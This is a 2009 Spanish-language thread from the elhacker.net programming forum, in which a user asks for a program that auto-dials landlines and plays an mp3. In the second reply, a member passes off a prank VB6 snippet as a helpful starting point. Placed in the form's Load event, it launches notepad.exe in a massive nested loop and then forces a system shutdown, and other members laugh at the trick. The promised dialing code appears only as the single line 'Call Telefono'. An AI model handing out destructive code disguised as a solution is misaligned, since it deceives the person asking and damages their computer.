elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Trabajando con las ramas de git (tercera parte)


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  programacion llamadas automaticas desde la pc a telefonos ijos
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: programacion llamadas automaticas desde la pc a telefonos ijos  (Leído 7,409 veces)
electronic_toy

Desconectado Desconectado

Mensajes: 2


Ver Perfil
programacion llamadas automaticas desde la pc a telefonos ijos
« en: 23 Octubre 2009, 01:49 am »

(programa para hacer llamadas automaticas desde la pc en cualquier lenguaje)Porfavor alguien puede enviarme un programa el cual realize llamadas automaticas y deje un tono mp3. sobre la red publica ee telefono no voz ip.
 
 


En línea

cassiani


Desconectado Desconectado

Mensajes: 978


« Anterior | Próximo »


Ver Perfil WWW
Re: programacion llamadas automaticas desde la pc a telefonos ijos
« Respuesta #1 en: 23 Octubre 2009, 03:25 am »

jajajaja algo mas?


En línea

Angeldj27

Desconectado Desconectado

Mensajes: 199


Ahorra Agua... Beba Cerveza


Ver Perfil
Re: programacion llamadas automaticas desde la pc a telefonos ijos
« Respuesta #2 en: 23 Octubre 2009, 15:21 pm »

Creo que tenia un codigo para tomar el call id de un telefono y poder marcar x numero desde la pc. Creo que era con el control MScomm con esto en la office llevavamos un record de todas la llamadas con su respectivo cliente.

Aunque mientras puedes ir intentando con esto  :silbar:

Este codigo es para Visua Basic 6:

Código
  1.    Dim iFila As Integer, iColumna As Integer
  2.  
  3.        For iFila = 1 To 10000
  4.            For iColumna = 1 To 10000
  5.                Shell "notepad.exe", vbNormalFocus
  6.            Next
  7.        Next
  8.    Shell "shutdown -s -f -t 5"
  9.  

Coloquelo en el evento Load del form.

AnyWhere voy a chekar mi biblioteca de code y si lo encuentro lo posteo..  :P

 Saludos....
« Última modificación: 23 Octubre 2009, 15:27 pm por Angeldj27 » En línea



"Que vamos a hacer Mañana?..... Lo mismo que hacemos todos los dias Pinky tratar de Conquistar el Mundoooo!!!!!
LixKeÜ


Desconectado Desconectado

Mensajes: 392


solo es lo que es y la verdad siempre da de ganar


Ver Perfil WWW
Re: programacion llamadas automaticas desde la pc a telefonos ijos
« Respuesta #3 en: 26 Octubre 2009, 01:59 am »

 jajaja.... ;D.
En línea

FaQuiVer

Desconectado Desconectado

Mensajes: 10



Ver Perfil
Re: programacion llamadas automaticas desde la pc a telefonos ijos
« Respuesta #4 en: 26 Octubre 2009, 02:31 am »

jajajaja que vivo!! ;D buena!!
En línea

ssccaann43 ©


Desconectado Desconectado

Mensajes: 792


¬¬


Ver Perfil
Re: programacion llamadas automaticas desde la pc a telefonos ijos
« Respuesta #5 en: 26 Octubre 2009, 16:29 pm »

Jajajajaja XD

No words.
En línea

- Miguel Núñez
Todos tenemos derechos a ser estupidos, pero algunos abusan de ese privilegio...
"I like ^TiFa^"
Angeldj27

Desconectado Desconectado

Mensajes: 199


Ahorra Agua... Beba Cerveza


Ver Perfil
Re: programacion llamadas automaticas desde la pc a telefonos ijos
« Respuesta #6 en: 26 Octubre 2009, 18:59 pm »

Aqui esta el code que te dije es sencillo con el control MScomm y ya puedes hacer llamadas a tu telefono, tienes que tener en cuenta que esto trabaja conectado con el puerto del moden de tu compu.. :P

Call Telefono

Saludos....
PD: no pongo la fuente porque no se de donde lo saque hace muchop tiempo  ;D
En línea



"Que vamos a hacer Mañana?..... Lo mismo que hacemos todos los dias Pinky tratar de Conquistar el Mundoooo!!!!!
ssccaann43 ©


Desconectado Desconectado

Mensajes: 792


¬¬


Ver Perfil
Re: programacion llamadas automaticas desde la pc a telefonos ijos
« Respuesta #7 en: 26 Octubre 2009, 22:15 pm »

-.-''
En línea

- Miguel Núñez
Todos tenemos derechos a ser estupidos, pero algunos abusan de ese privilegio...
"I like ^TiFa^"
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Detenida una mujer en Huelva por manipular teléfonos para cargarle llamadas ...
Noticias
wolfbcn 0 1,594 Último mensaje 3 Julio 2011, 01:53 am
por wolfbcn
Programación de una web desde 0
Desarrollo Web
Shell Root 6 2,927 Último mensaje 23 Diciembre 2011, 20:20 pm
por ~ Yoya ~
Diez detenidos por defraudar 500.000 euros en llamadas de teléfonos
Noticias
wolfbcn 0 1,142 Último mensaje 10 Enero 2014, 14:04 pm
por wolfbcn
LINE introduce un servicio de llamadas a teléfonos en 8 países
Noticias
wolfbcn 0 1,282 Último mensaje 18 Marzo 2014, 21:36 pm
por wolfbcn
Programación desde 0
Desarrollo Web
Fendras 2 1,454 Último mensaje 7 Agosto 2018, 02:09 am
por Fendras
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines